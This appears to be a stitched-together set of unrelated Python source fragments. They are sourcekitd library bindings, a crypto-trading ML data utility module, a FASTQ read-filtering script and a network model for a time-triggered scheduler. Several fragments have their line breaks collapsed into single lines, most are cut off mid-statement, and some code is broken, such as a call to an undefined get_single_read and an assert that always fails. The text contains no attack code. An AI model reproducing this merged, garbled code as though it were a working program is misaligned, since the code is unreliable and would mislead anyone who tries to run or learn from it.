try: func = getattr(lib, item[0]) except AttributeError as e: msg = str(e) + ". Please ensure that your python bindings are "\ "compatible with your sourcekitd version." if ignore_errors: return raise LibsourcekitdError(msg) if len(item) >= 2: func.argtypes = item[1] if len(item) >= 3: func.restype = item[2] if len(item) == 4: func.errcheck = item[3] def register_functions(lib, ignore_errors): """Register function prototypes with a sourcekitd library instance. This must be called as part of library instantiation so Python knows how to call out to the shared library. """ def register(item): return register_function(lib, item, ignore_errors) map(register, functionList) class Config: library_path = None library_file = None loaded = False @staticmethod def set_library_path(path): """Set the path in which to search for sourcekitd""" if Config.loaded: raise Exception("library path must be set before before using " "any other functionalities in sourcekitd.") Config.library_path = path @staticmethod def set_library_file(filename): """Set the exact location of sourcekitd""" if Config.loaded: raise Exception("library file must be set before before using " "any other functionalities in sourcekitd.") Config.library_file = filename @CachedProperty def lib(self): lib = self.get_sourcekitd_library() register_functions(lib, False) Config.loaded = True return lib @CachedProperty def free(self): free = cdll.LoadLibrary('libc.dylib').free free.argtypes = [c_void_p] return free def get_filename(self): if Config.library_file: return Config.library_file import platform name = platform.system() if name == 'Darwin': # The XPC service cannot run via the bindings due to permissions issue.
# file = 'sourcekitd.framework/sourcekitd' file = 'libsourcekitdInProc.dylib' elif name == 'Windows': file = 'sourcekitd.dll' else: file = 'sourcekitd.so' if Config.library_path: file = Config.library_path + '/' + file return file def get_sourcekitd_library(self): try: library = cdll.LoadLibrary(self.get_filename()) except OSError as e: msg = str(e) + ". To provide a path to sourcekitd use " \ "Config.set_library_path() or
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 7 21:43:26 2019

@author: tc
"""
# NOTE(review): this chunk's original whitespace was destroyed (lines were
# collapsed); the code below is the same statements re-flowed.
# import numpy as np
import pandas as pd
from queue import Queue
from datetime import datetime, timedelta
import math
from sklearn.utils import Bunch
import numpy as np
import sys
from enum import Enum

PICKLE_EXT = ".pydata"  # pickle file extension
JSON_EXT = ".json"  # msgpack file extension
MSG_EXT = ".msg"  # msgpack file extension

DT_FORMAT = "%Y-%m-%d_%Hh%Mm"
FEE = 1/1000  # in per mille, transaction fee is 0.1%
TRADE_SLIP = 0  # 1/1000 # in per mille, 0.1% trade slip
BUY_THRESHOLD = 10/1000  # in per mille
SELL_THRESHOLD = -5/1000  # in per mille
VOL_BASE_PERIOD = "1D"
CPC = "CPC"
HOLD = "-"
BUY = "buy"
SELL = "sell"
NA = "not assigned"
TRAIN = "training"
VAL = "validation"
TEST = "test"
TARGETS = {HOLD: 0, BUY: 1, SELL: 2}  # dict with int encoding of target labels
TARGET_NAMES = {0: HOLD, 1: BUY, 2: SELL}  # dict with int encoding of targets
TARGET_KEY = 5
LBL = {NA: 0, TRAIN: -1, VAL: -2, TEST: -3}
QUOTE = "usdt"
MANDATORY_STEPS = 2  # number of steps for the smallest class (in general BUY)
SMALLER_16GB_RAM = True
DATA_KEYS = ["open", "high", "low", "close", "volume"]  # , "price"

# Mutable module-level configuration; populated by set_environment().
DATA_PATH = ""
OTHER_PATH_PREFIX = ""
DATA_PATH_PREFIX = ""
HOME = ""
BASES = []
TIME_AGGS = {}
print(f"len BASES: {len(BASES)}")
print(f"len TIME_AGGS: {len(TIME_AGGS)}")
print(f"len DATA_PATH: {len(DATA_PATH)}")


class Env(Enum):
    ubuntu = 1
    osx = 2
    floydhub = 3
    colab = 4


class TestConf(Enum):
    test = 1
    production = 2


def config_ok():
    """Return True once set_environment() has populated DATA_PATH."""
    return len(DATA_PATH) > 0


def set_environment(test_conf, this_env):
    """Configure module-level paths, bases and aggregations.

    *this_env* selects the host (Env member); *test_conf* selects the
    TestConf.test or TestConf.production data set.
    """
    global HOME
    global DATA_PATH
    global OTHER_PATH_PREFIX
    global DATA_PATH_PREFIX
    global BASES
    global TIME_AGGS

    if this_env == Env.osx:
        HOME = "/Users/tc/"
        DATA_PATH_PREFIX = HOME + "crypto/"
        OTHER_PATH_PREFIX = HOME + "crypto/"
    elif this_env == Env.ubuntu:
        HOME = "/home/tor/"
        DATA_PATH_PREFIX = HOME + "crypto/"
        OTHER_PATH_PREFIX = HOME + "crypto/"
    elif this_env == Env.colab:
        HOME = "/content/gdrive/My Drive/"
        DATA_PATH_PREFIX = HOME
        OTHER_PATH_PREFIX = HOME
        # NOTE(review): TestConf members are truthy, so this assert always
        # fails when test_conf is a TestConf — looks like a legacy boolean
        # check; confirm intent before relying on colab/floydhub paths.
        assert(not test_conf)
    elif this_env == Env.floydhub:
        HOME = ""
        DATA_PATH_PREFIX = "/floyd/input/"
        OTHER_PATH_PREFIX = HOME
        assert(not test_conf)
    else:
        raise ValueError(f"configuration fault in this_env: {this_env}")

    if test_conf == TestConf.test:
        DATA_PATH = f"{DATA_PATH_PREFIX}TestFeatures/"  # local execution
        TIME_AGGS = {1: 10, 5: 10, 15: 10, 60: 10, 4*60: 10, 24*60: 10}
        # BASES = ["xrp", "bnb", "eos"]
        # BASES = ["xrp", "eos"]
        BASES = ["xrp"]
    elif test_conf == TestConf.production:
        DATA_PATH = f"{DATA_PATH_PREFIX}Features/"
        BASES = ["xrp", "eos", "bnb", "btc", "eth", "neo", "ltc", "trx"]
        TIME_AGGS = {1: 10, 5: 10, 15: 10, 60: 10, 4*60: 10, 24*60: 10}
    else:
        raise ValueError(f"configuration fault in test_conf: {test_conf}")


def sets_config_fname():
    """Path of the train/val/test split configuration file."""
    cfname = DATA_PATH + "target_5_sets_split.config"
    return cfname


def timestr(ts=None):
    """Format *ts* (or now) using the module DT_FORMAT."""
    if ts is None:
        return datetime.now().strftime(DT_FORMAT)
    else:
        return pd.to_datetime(ts).strftime(DT_FORMAT)


def time_in_index(dataframe_with_timeseriesindex, tic):
    """True if timestamp *tic* is present in the frame's index."""
    return True in dataframe_with_timeseriesindex.index.isin([tic])


def sym_of_base(base):
    """Build the '<base>_<quote>' symbol for *base*."""
    s = f"{base.lower()}_{QUOTE}"
    return s


def base_of_sym(sym):
    """Extract the base currency from symbol *sym*; raise ValueError on failure."""
    s = sym.lower()
    q = QUOTE.lower()
    ix = s.find(q)
    if ix < 0:
        raise ValueError(f"base_of_sym {sym}: no quote {QUOTE} found")
    if ix == 0:
        raise ValueError(f"base_of_sym {sym}: no base found")
    if not s[ix-1].isalpha():
        # seperation character found
        ix -= 1
    b = s[0:ix]
    return b


class NoSubsetWarning(Exception):
    pass


def targets_to_features(tfv_ta_df, target_df):
    """Extracts a sample subset with targets and features of a specific time aggregation
    based on given targets. target_df and tfv_ta_df both have to share the same index basis.
    The index of target_df shall be a subset of tfv_ta_df.
    """
    df = tfv_ta_df[tfv_ta_df.index.isin(target_df.index)]
    # check compatibility of target_df.sym with
    d = len(target_df.index.difference(tfv_ta_df.index))
    c = len(df)
    b = len(target_df)
    p = len(tfv_ta_df)
    if d > 0:
        raise NoSubsetWarning(f"subset({b}) with {c}/{d} rows that are/are not in superset({p})")
    return df


def save_asset_dataframe(df, path, cur_pair):
    """Persist *df* for *cur_pair* via msgpack under *path*."""
    # "saves the object via msgpack"
    # cur_pair = cur_pair.replace("/", "_")
    fname = path + cur_pair + "_DataFrame.msg"
    print("{}: writing {} {} tics ({} - {})".format(
        datetime.now().strftime(DT_FORMAT), cur_pair, len(df),
        df.index[0].strftime(DT_FORMAT), df.index[len(df)-1].strftime(DT_FORMAT)))
    # NOTE(review): DataFrame.to_msgpack was removed in pandas >= 1.0;
    # this module pins an older pandas — confirm.
    df.to_msgpack(fname)


def load_asset_dataframefile(fname):
    """Load a msgpack DataFrame; return None when the file is absent/bad."""
    # "loads the object via msgpack"
    df = None
    try:
        df = pd.read_msgpack(fname)
        print("{}: load {} {} tics ({} - {})".format(
            datetime.now().strftime(DT_FORMAT), fname, len(df),
            df.index[0].strftime(DT_FORMAT), df.index[len(df)-1].strftime(DT_FORMAT)))
    except IOError:
        print(f"{timestr()} load_asset_dataframefile ERROR: cannot load {fname}")
    except ValueError:
        return None
    return df


def dfdescribe(desc, df):
    """Print a short statistical summary of *df* labelled *desc*."""
    print(desc)
    print(df.describe())
    print(df.head())
    print(df.tail())


def merge_asset_dataframe(path, base):
    """Merge <base>_usdt with <base>_btc * btc_usdt history and save the result.

    Direct usdt quotes are preferred where available; earlier history is
    reconstructed by multiplying the btc quote with btc_usdt.
    """
    # "loads the object via msgpack"
    fname = path + "btc_usdt" + "_DataFrame.msg"
    btcusdt = load_asset_dataframefile(fname)
    if base != "btc":
        fname = path + base + "_btc" + "_DataFrame.msg"
        basebtc = load_asset_dataframefile(fname)
        dfdescribe(f"{base}-btc", basebtc)
        fname = path + base + "_usdt" + "_DataFrame.msg"
        baseusdt = load_asset_dataframefile(fname)
        dfdescribe(f"{base}-usdt", baseusdt)
        if (baseusdt.index[0] <= basebtc.index[0]) or (baseusdt.index[0] <= btcusdt.index[0]):
            basemerged = baseusdt
        else:
            basebtc = basebtc[basebtc.index.isin(btcusdt.index)]
            basemerged = pd.DataFrame(btcusdt)
            basemerged = basemerged[basemerged.index.isin(basebtc.index)]
            for key in DATA_KEYS:
                if key != "volume":
                    # price in usdt = price in btc * btc price in usdt
                    basemerged[key] = basebtc[key] * btcusdt[key]
            basemerged["volume"] = basebtc.volume
            dfdescribe(f"{base}-btc-usdt", basemerged)

            baseusdt = baseusdt[baseusdt.index.isin(basemerged.index)]
            assert not baseusdt.empty
            basemerged.loc[baseusdt.index] = baseusdt[:]  # take values of cusdt where available
    else:
        basemerged = btcusdt
    dfdescribe(f"{base}-merged", basemerged)

    save_asset_dataframe(basemerged, DATA_PATH, base + "usdt")

    return basemerged


def load_asset_dataframe(path, base):
    """Load the merged <base>_<QUOTE> history; raise MissingHistoryData if absent."""
    # "loads the object via msgpack"
    fname = path + base + f"_{QUOTE}" + "_DataFrame.msg"
    dfbu = load_asset_dataframefile(fname)
    if dfbu is None:
        raise MissingHistoryData("Cannot load {}".format(fname))
    return dfbu


def report_setsize(setname, df):
    """Print the per-class sample counts of *df* for set *setname*."""
    hc = len(df[df.target == TARGETS[HOLD]])
    sc = len(df[df.target == TARGETS[SELL]])
    bc = len(df[df.target == TARGETS[BUY]])
    tc = hc + sc + bc
    print(f"buy {bc} sell {sc} hold {hc} total {tc} on {setname}")


def str_setsize(df):
    """Return the per-class sample counts of *df* as a string."""
    hc = len(df[df.target == TARGETS[HOLD]])
    sc = len(df[df.target == TARGETS[SELL]])
    bc = len(df[df.target == TARGETS[BUY]])
    tc = hc + sc + bc
    return f"buy {bc} sell {sc} hold {hc} total {tc}"


def smallest_dict_key(thisdict):
    """Return the smallest integer key of *thisdict*; assert if none exists."""
    smallest_key = 5000
    for k in thisdict:
        if isinstance(k, int):
            if k < smallest_key:
                smallest_key = k
    assert smallest_key != 5000, "no int in dict keys"
    return smallest_key


def to_scikitlearn(df, np_data=None, descr=None):
    """Load and return the crypto dataset (classification).

    Returns a sklearn Bunch with data, target, close, tics and metadata.
    """
    fn_list = list(df.keys())
    fn_list.remove("target")
    fn_list.remove("close")
    if np_data is None:
        # data = df[fn_list].to_numpy(dtype=float)  # incompatible with pandas 0.19.2
        data = df[fn_list].values
    else:
        data = np_data
    # target = df["target"].to_numpy(dtype=float)  # incompatible with pandas 0.19.2
    # tics = df.index.to_numpy(dtype=np.datetime64)  # incompatible with pandas 0.19.2
    target = df["target"].values  # compatible with pandas 0.19.2
    close = df["close"].values  # compatible with pandas 0.19.2
    tics = df.index.values  # compatible with pandas 0.19.2
    feature_names = np.array(fn_list)
    # BUG FIX: np.array(dict_keys) yields a useless 0-d object array under
    # Python 3; materialize the keys first.
    target_names = np.array(list(TARGETS.keys()))
    if descr is None:
        descr = "missing description"

    return Bunch(data=data, target=target, close=close,
                 target_names=target_names, tics=tics,
                 descr=descr, feature_names=feature_names)


class Tee(object):
    """Duplicate sys.stdout into a file for the lifetime of the instance."""

    def __init__(self, name, mode="w"):
        self.file = open(name, mode)
        self.stdout = sys.stdout
        sys.stdout = self

    def close(self):
        # Restore stdout first so later prints are not lost, then close the file.
        if self.stdout is not None:
            sys.stdout = self.stdout
            self.stdout = None
        if self.file is not None:
            self.file.close()
            self.file = None

    def write(self, data):
        self.file.write(data)
        self.stdout.write(data)

    def flush(self):
        self.file.flush()
        self.stdout.flush()

    def __del__(self):
        self.close()


class MissingHistoryData(Exception):
    pass


class TargetsFeatures:
    """Receives a dict of currency pairs with associated minute candle data and
    transforms it into a dict of currency pairs with associated dicts of
    time_aggregations features. The time aggregation is the dict key with one
    special key 'CPC' that provides the summary targets

    Attributes
    ----------
    time_aggregations:
        dict with required time aggregation keys and associated number
        of periods that shall be compiled in a corresponding feature vector
    minute_data:
        currency pair (as keys) dict of input minute data as corresponding
        pandas DataFrame

    To Do
    =====
    buy - sell signals:
        now reduced to first signal
        rolling shall allow a richer buy - sell signalling that are simply mapped on a
        common timeline where the optimization problem is addressed

    >>> read dataframe from file
    >>> concatenate features to full feature vector and write it as file

    abbreviatons and terms
    ======================
    time aggregation - time period for which features are derived, e.g. open, close, high, low.
    In this context different time aggregations are used to low pass filter high frequent
    volatility.
    cpc - currency pair classifier

    """

    def __init__(self, base, quote):
        """Receives the key attributes for feature generation

        aggregations:
            dict with required time aggregation keys and associated number
            of periods that shall be compiled in a corresponding feature vector
        target_key:
            has to be a key of aggregations. Targets are only calculated for that target_key
        """
        assert(config_ok())
        self.base = base
        self.quote = quote
        self.minute_data = None
        self.minimum_minute_data = 0
        self.vec = None
        self.target_key = TARGET_KEY
        self.minimum_minute_df_len = 0
        for agg in TIME_AGGS:
            assert isinstance(agg, int)
            value = TIME_AGGS[agg]
            assert isinstance(value, int)
            minlen = agg * value
            if self.minimum_minute_df_len < minlen:
                # NOTE(review): the source chunk is truncated mid-statement
                # here; "= minlen" is the only sensible completion — confirm
                # against the full file.
                self.minimum_minute_df_len = minlen
<filename>src/fastqfilter.py #! /usr/bin/env python3 # Copyright <NAME>, 2015. www.sovic.org # # A script that takes an input FASTA/FASTQ file and performs various methods # of filtering on it. Examples include: selecting sequences that contain certain # strings in their header, and others. import re import os import sys import fastqparser import numpy as np import random import operator; def filter_seqs_by_header(input_fastq_path, header_patterns_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); try: fp_filter = open(header_patterns_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % header_patterns_path); exit(0); filter_headers = fp_filter.readlines(); filter_headers = [line.strip() for line in filter_headers if (len(line.strip()) > 0)]; fp_filter.close(); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; for filter_header in filter_headers: if ((filter_header[-1] == ';' and filter_header[0:-1].lower() == header.lower()) or (filter_header[-1] != ';' and filter_header.lower() in header.lower())): num_matches += 1; sys.stderr.write('\rFound %d seqs, last: "%s".' % (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); break; sys.stderr.write('\n'); fp_in.close(); def filter_seqs_by_read_id(input_fastq_path, read_id_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); try: fp_filter = open(read_id_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! 
Exiting.\n' % read_id_path); exit(0); filter_read_ids = fp_filter.readlines(); fp_filter.close(); filter_read_ids = [int(line.strip()) for line in filter_read_ids if (len(line.strip()) > 0)]; id_hash = {}; for read_id in filter_read_ids: id_hash[read_id] = 1; num_matches = 0; num_reads = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (num_reads in id_hash): num_matches += 1; sys.stderr.write('\rFound %d seqs.' % (num_matches)); fp_out.write('\n'.join(read) + '\n'); num_reads += 1; sys.stderr.write('\n'); fp_in.close(); def filter_seqs_by_header_list(input_fastq_path, filter_headers, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; for filter_header in filter_headers: if ((filter_header[-1] == ';' and filter_header[0:-1].lower() == header.lower()) or (filter_header[-1] != ';' and filter_header.lower() in header.lower())): num_matches += 1; sys.stderr.write('\rFound %d seqs, last: "%s".' % (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); break; sys.stderr.write('\n'); fp_in.close(); def filter_duplicate_ncbi_id(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; id_hash = {}; i = 0; while True: i += 1; [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; header_id = header.split()[0].lower(); if (header_id in id_hash): continue; num_matches += 1; if ((i % 1000) == 0): sys.stderr.write('\rFound %d seqs, last: "%s".' 
% (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); id_hash[header_id] = True; sys.stderr.write('\n'); fp_in.close(); def join_fastq_lines(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; fp_out.write('\n'.join(read) + '\n'); sys.stderr.write('\n'); fp_in.close(); def filter_seqs_by_length(input_fastq_path, length_threshold, is_less_than, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; i = 0; while True: i += 1; [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if ((is_less_than == False and len(read[1]) >= length_threshold) or (is_less_than == True and len(read[1]) <= length_threshold)): num_matches += 1; if ((i % 1000) == 0): sys.stderr.write('\rFound %d seqs, last: "%s".' % (num_matches, header)); fp_out.write('\n'.join(read) + '\n'); # fp_out.write('\n'); # fp_out.write('(1) ' + read[0] + '\n'); # fp_out.write('(2) ' + read[1] + '\n'); # exit(1); sys.stderr.write('\n'); fp_in.close(); def base_quality_stats(input_fastq_path): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_reads = 0; means_1d = []; means_2d = []; while True: if ((num_reads % 100) == 0): sys.stderr.write('\rProcessing seq %d...' % num_reads); [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read) < 4): sys.stderr.write('Given file is not a FASTQ file! 
Exiting.\n'); exit(1); quals = read[3]; phreds = []; for char in quals: phreds.append(ord(char) - 33); if (('twodir' in header.lower()) or ('-2d' in header.lower())): means_2d.append(np.mean(phreds)); else: means_1d.append(np.mean(phreds)); num_reads += 1; sys.stderr.write('\n'); if (len(means_1d) > 0): sys.stdout.write('[1d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (np.mean(means_1d), np.std(means_1d), min(means_1d), max(means_1d))); else: sys.stdout.write('[1d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (0.0, 0.0, 0.0, 0.0)); if (len(means_2d) > 0): sys.stdout.write('[2d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (np.mean(means_2d), np.std(means_2d), min(means_2d), max(means_2d))); else: sys.stdout.write('[2d] avg = %5.2f\tstd = %5.2f\tmin = %2d\tmax = %2d\n' % (0.0, 0.0, 0.0, 0.0)); fp_in.close(); def base_quality_filter(input_fastq_path, lte_gte, qv_threshold, out_fastq_path, fp_out): # print 'lte_gte = "%s"' % (lte_gte); try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); return; num_reads = 0; num_outputted_reads = 0; num_skipped_reads = 0; while True: if ((num_reads % 1000) == 0): sys.stderr.write('\rProcessing seq %d, (%d passed)...' % (num_reads, num_outputted_reads)); [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read) < 4): sys.stderr.write('Given file is not a FASTQ file! 
Exiting.\n'); return; quals = read[3]; phreds = []; for char in quals: phreds.append(ord(char) - 33); mean_qv = np.mean(phreds); if ((lte_gte == 'gt' and mean_qv > qv_threshold) or (lte_gte == 'gte' and mean_qv >= qv_threshold) or (lte_gte == 'lt' and mean_qv < qv_threshold) or (lte_gte == 'lte' and mean_qv <= qv_threshold) or (lte_gte == 'eq' and mean_qv == qv_threshold)): fp_out.write('\n'.join(read) + '\n'); num_outputted_reads += 1; else: num_skipped_reads += 1; num_reads += 1; sys.stderr.write('\n'); sys.stderr.write('Total number of sequences: %d\n' % (num_reads)); sys.stderr.write('Number of outputted sequences: %d\n' % (num_outputted_reads)); sys.stderr.write('Number of sequences not satisfying condition: %d\n' % (num_skipped_reads)); sys.stderr.write('\n'); fp_in.close(); def reverse_complement_seqs(input_fastq_path): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_reads = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read) == 2): sys.stdout.write('%s\n' % read[0]); sys.stdout.write('%s\n' % fastqparser.revcomp_seq(read[1])); elif (len(read) == 4): sys.stdout.write('%s\n' % read[0]); sys.stdout.write('%s\n' % fastqparser.revcomp_seq(read[1])); sys.stdout.write('%s\n' % read[2]); sys.stdout.write('%s\n' % read[3][::-1]); num_reads += 1; sys.stderr.write('\n'); fp_in.close(); def hard_clip(input_fastq_path, num_bases): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_reads = 0; sys.stderr.write('Trimming %dbp from the beginning and ending of each sequence.\n' % num_bases); sys.stderr.write('Starting to process file "%s".\n' % input_fastq_path); while True: num_reads += 1; if ((num_reads % 1000) == 0): sys.stderr.write('\rProcessing seq %d...' 
% num_reads); [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; if (len(read[1]) <= (2*num_bases)): # sys.stderr.write('Skipping, len(read[1]) = %d, num_bases = %d\n' % (len(read[1]), num_bases) ); continue; if (len(read) == 2): clipped_seq = read[1][num_bases:-num_bases]; sys.stdout.write('%s_clipped\n' % read[0]); sys.stdout.write('%s\n' % clipped_seq); elif (len(read) == 4): clipped_seq = read[1][num_bases:-num_bases]; clipped_qual = read[3][num_bases:-num_bases]; sys.stdout.write('%s_clipped\n' % read[0]); sys.stdout.write('%s\n' % clipped_seq); sys.stdout.write('%s\n' % read[2]); sys.stdout.write('%s\n' % clipped_qual); sys.stderr.write('\n'); fp_in.close(); def remove_special_chars_from_headers(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); num_matches = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; # read[0] = read[0][0] + read[0][1:].replace(); read[0] = read[0][0] + re.sub('[^0-9a-zA-Z]', '_', read[0][1:]); # re.sub("[|:", "_", read[0][1:]); fp_out.write('\n'.join(read) + '\n'); sys.stderr.write('\n'); fp_in.close(); def filter_for_marginalign(input_fastq_path, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); if (fp_out == None): if (input_fastq_path == out_fastq_path): sys.stderr.write('ERROR: Output and input files are the same! Exiting.\n'); exit(0); try: fp_out = open(out_fastq_path, 'w'); except: sys.stderr.write('ERROR: Could not open file "%s" for writing! 
Exiting.\n' % out_fastq_path); exit(0); num_matches = 0; header_hash = {}; while True: [header, read] = get_single_read(fp_in); if (len(read) == 0): break; # read[0] = read[0][0] + read[0][1:].replace(); if (len(read[1]) <= 50000): # read[0] = read[0][0] + re.sub('[^0-9a-zA-Z]', '_', read[0][1:]); # re.sub("[|:", "_", read[0][1:]); new_header = read[0][0] + re.sub('[^0-9a-zA-Z]', '_', read[0][1:]); # re.sub("[|:", "_", read[0][1:]); header_hash[new_header[1:]] = read[0][1:]; read[0] = new_header; fp_out.write('\n'.join(read) + '\n'); sys.stderr.write('\n'); fp_in.close(); return header_hash; def wrap_fastq_file(input_fastq_path, wrap_length, out_fastq_path, fp_out): try: fp_in = open(input_fastq_path, 'r'); except: sys.stderr.write('ERROR: Could not open file "%s" for reading! Exiting.\n' % input_fastq_path); exit(0); current_read = 0; while True: [header, read] = fastqparser.get_single_read(fp_in); if (len(read) == 0): break; current_read += 1; read[1] = re.sub("(.{%d})"%(wrap_length), "\\1\n",
<reponame>buaales/tt_offline_scheduler import typing import networkx import networkx.algorithms.approximation import matplotlib.pyplot as plt import pprint import math import pandas from fractions import Fraction from collections import defaultdict class Frame: _id = 0 def __init__(self, app: 'Application', peroid: int, length: int = 1): self._app = app self._offset: int = 0 self._peroid: int = peroid self._length: int = length self._id = Frame._id self._min_offset = 0 self._max_offset = peroid Frame._id += 1 @property def app(self) -> 'Application': return self._app @property def length(self) -> int: return self._length @length.setter def length(self, length): self._length = length @property def peroid(self) -> int: return self._peroid @peroid.setter def peroid(self, p): self._peroid = p @property def offset(self): return self._offset @property def id(self): return self._id @offset.setter def offset(self, length): self._offset = length @property def min_offset(self): return self._min_offset @min_offset.setter def min_offset(self, min_offset): self._min_offset = min_offset @property def max_offset(self): return self._max_offset @max_offset.setter def max_offset(self, max_offset): self._max_offset = max_offset def __eq__(self, value: 'Frame'): return value._id == self._id def __hash__(self): return hash(self._id) def __str__(self): return f'{self._id}:{self._peroid}' class NamedObj: def __init__(self, name: str): self._name = name def __eq__(self, value): return (isinstance(value, Node) and value._name == self._name) or (value == self._name) def __hash__(self): return hash(self._name) @property def name(self): return self._name def __str__(self): return self.name class Node(NamedObj): """代表网络中的节点,节点之间可以互联""" def __init__(self, name: str): super().__init__(name) class EndNode(Node): """网络中的计算节点""" def __init__(self, name: str): super().__init__(name) class SwitchNode(Node): """网络中的交换机""" def __init__(self, name: str, delay: int = 300, membound: int = 999999): 
super().__init__(name) self._delay = delay # no internal delay self._membound = membound # unlimited membound @property def delay(self): return self._delay @delay.setter def delay(self, delay: int): self._delay = delay @property def membound(self): return self._membound @membound.setter def membound(self, bound: int): self._membound = bound class Link: """代表一条数据流链路,链接了两个节点""" def __init__(self, node1: Node, node2: Node): self._node1 = node1 self._node2 = node2 @property def node1(self): return self._node1 @property def node2(self): return self._node2 def __hash__(self): return hash((self.node1.name, self.node2.name)) def __eq__(self, value): return self.node1 == value.node1 and self.node2 == value.node2 def __str__(self): return f'{self._node1.name} -> {self._node2.name}' class Network: """网络拓扑""" def __init__(self): self._node_name_map: typing.Dict[str, Node] = dict() self._nodes: typing.Set[Node] = set() self._end_nodes: typing.Set[EndNode] = set() self._msg_nodes: typing.Set[SwitchNode] = set() self._link_name_map: typing.Dict[typing.Tuple[str, str], Link] = dict( ) self._links: typing.Set[Link] = set() self._neighbor: typing.DefaultDict[Node, typing.Set[Node]] = defaultdict( set) # 每个节点的邻居节点 self._graph = networkx.DiGraph() @property def end_nodes(self): return self._end_nodes @property def msg_nodes(self): return self._msg_nodes def add_neighbor(self, node_me: Node, node_neighbor: Node): if node_me not in self._nodes: raise Exception("Node not in network") if node_neighbor in self._neighbor[node_me]: raise Exception("neighbor redefined") self._neighbor[node_me].add(node_neighbor) def add_node(self, node: Node) -> 'Network': self._nodes.add(node) self._node_name_map[node.name] = node if isinstance(node, EndNode): self._end_nodes.add(node) elif isinstance(node, SwitchNode): self._msg_nodes.add(node) return self def add_link(self, node1_name: str, node2_name: str) -> 'Network': node1 = self[node1_name] node2 = self[node2_name] link1 = Link(node1, node2) link2 = 
Link(node2, node1) self._links.add(link1) self._links.add(link2) self.add_neighbor(node1, node2) self.add_neighbor(node2, node1) self._graph.add_edge(node1.name, node2.name) self._graph.add_edge(node2.name, node1.name) self._link_name_map[(node1.name, node2.name)] = link1 self._link_name_map[(node2.name, node1.name)] = link2 return self def get_link_by_name(self, node1: typing.Union[Node, str], node2: typing.Union[Node, str]): if isinstance(node1, Node): node1 = node1.name if isinstance(node2, Node): node2 = node2.name return self._link_name_map[(node1, node2)] def get_link_helper(self): def helper(node_name1: str, node_targets: typing.Union[typing.List[str], str]): if node_name1 is None: raise Exception('node_name1 should not be None') if not isinstance(node_targets, list): node_targets = [node_targets] for n in node_targets: #print('add {} {}'.format(node_name1, n)) self.add_link(node_name1, n) return helper return helper def __getitem__(self, name: str) -> Node: return self._node_name_map[name] def __str__(self): return pprint.pformat(self._neighbor) @property def graph(self): return self._graph def draw(self): networkx.draw_networkx(self.graph) plt.axis('off') plt.show() class VirtualLink(NamedObj): """数据流虚链路""" def __init__(self, name: str, network: Network, app: 'Application', sender: Node, receivers: typing.List[Node], receive_task): super().__init__(name) self._network: Network = network self._sender: Node = sender self._receivers: typing.List[Node] = receivers self._receive_task = receive_task # TODO: TEMP ADD self._app: 'Application' = app self._steiner_tree: networkx.classes.Graph = None self._reciever_path: typing.Dict[str, typing.List[str]] = defaultdict(list) # 从发送者到每个接收者的斯坦纳树路径 self._init_virtual_link(sender.name, [x.name for x in receivers]) def _init_virtual_link(self, sender: str, receivers: typing.List[str]): g = self._network.graph.to_undirected() res = networkx.algorithms.approximation.steiner_tree(g, [sender] + receivers) self._steiner_tree = 
